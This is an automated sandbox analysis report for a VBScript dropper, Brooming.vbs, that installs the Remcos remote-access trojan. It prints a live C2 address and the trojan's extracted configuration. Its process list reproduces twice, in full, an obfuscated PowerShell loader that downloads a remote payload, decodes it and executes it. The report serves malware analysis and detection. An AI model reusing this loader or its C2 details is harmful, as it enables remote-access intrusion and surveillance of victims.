Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Brooming.vbs

windows7-x64

10

Brooming.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19/12/2024, 06:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Brooming.vbs

  • Size

    46KB

  • MD5

    fbcaeb4144c55d299c7703277c01c329

  • SHA1

    bc1b38c0454d1badf6ce204029a856a971f156c1

  • SHA256

    6c6329c8ab3fa52c199cbbf9b270f8faaa05dc74d7f78cbd5ac8bbea61ef49bc

  • SHA512

    b0a55cfcf5cc6a147d1b886dc5b91354ac16b63bbb3f7ee75d77567c76e5b537c141663c8688422a967a9005afebab1edeb6a53b72f5f53970f4cc49b79f0962

  • SSDEEP

    768:s4jyyG+RN4ot+jCI5zZPoxnUMDUWnaaEUuZplI8Z9TDgAuovEKFgS:syyFMujCI5zZEnUM5a3USHLcAEAJ

Score
10/10
remcosremotehostdiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

154.216.20.209:2404

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    true

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-BNP8PO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Brooming.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN None ManNKa,rTSell= Az (SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2832
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN None ManNKa,rTSell= Az (SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\ProgramData\Remcos\remcos.exe
        "C:\ProgramData\Remcos\remcos.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2432

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Knapmagerens.Stu
    Filesize

    412KB

    MD5

    06d9d0ca2e545e2472691c84122a5372

    SHA1

    6d1af98a3741d350d3e3a5735c6db3bebedbba4b

    SHA256

    ee746e93f909fc27907a8bf180c62f0d334e549338da0fe7bb8eb5c229b77b5a

    SHA512

    37b10f2f7176651f142ed98acb794b4c97d7772a608861cafa2c696085b276b0097811c0c1b394c9aabc89f4612b280689fa69058e6068c78c8c27e75bd5e3e5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BB6IXMTJNWKHY1LFV4F8.temp
    Filesize

    7KB

    MD5

    d4e8644ca04127fca0307eb1c976de5d

    SHA1

    3df7f6a8f326417370ea2db8c85cf16e1d458f69

    SHA256

    1efda70dc5cd7f9c4624e10566f6261419801bd2d56f04ff958858208f24c606

    SHA512

    352c86f57d2521d643e476066f5e983b735a08e33b87b7ee13b8d13428102384234a467c5c0b24126eeab179afee4b340b89f48458a28cd5581416d8d726975f

    Download Submit

  • \ProgramData\Remcos\remcos.exe
    Filesize

    71KB

    MD5

    eee470f2a771fc0b543bdeef74fceca0

    SHA1

    bd9bbb448dec04b1aaa8ae530e9814fdbce0a3d5

    SHA256

    78617ddf9a0067a32cb5d87a796c93a9618ac006ccdcb3c7c824fdeb6ec5fd59

    SHA512

    9a89fef9c26e3dc98afdc61eea66e2b4a52843495b3433c21b5a55e744db42268e3d10587817b4c8adc7bfcc99065e0f3a7b6a7a05b1218ce7bba129d5a105e2

    Download Submit

  • memory/1992-46-0x0000000000CC0000-0x0000000001D22000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1992-37-0x0000000000CC0000-0x0000000001D22000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1992-35-0x0000000000CC0000-0x0000000001D22000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2832-14-0x000007FEF69FE000-0x000007FEF69FF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2832-11-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-4-0x000007FEF69FE000-0x000007FEF69FF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2832-15-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-10-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-9-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-8-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2832-7-0x000007FEF6740000-0x000007FEF70DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3040-19-0x00000000067B0000-0x000000000BB72000-memory.dmp

    Filesize

    83.8MB

    Download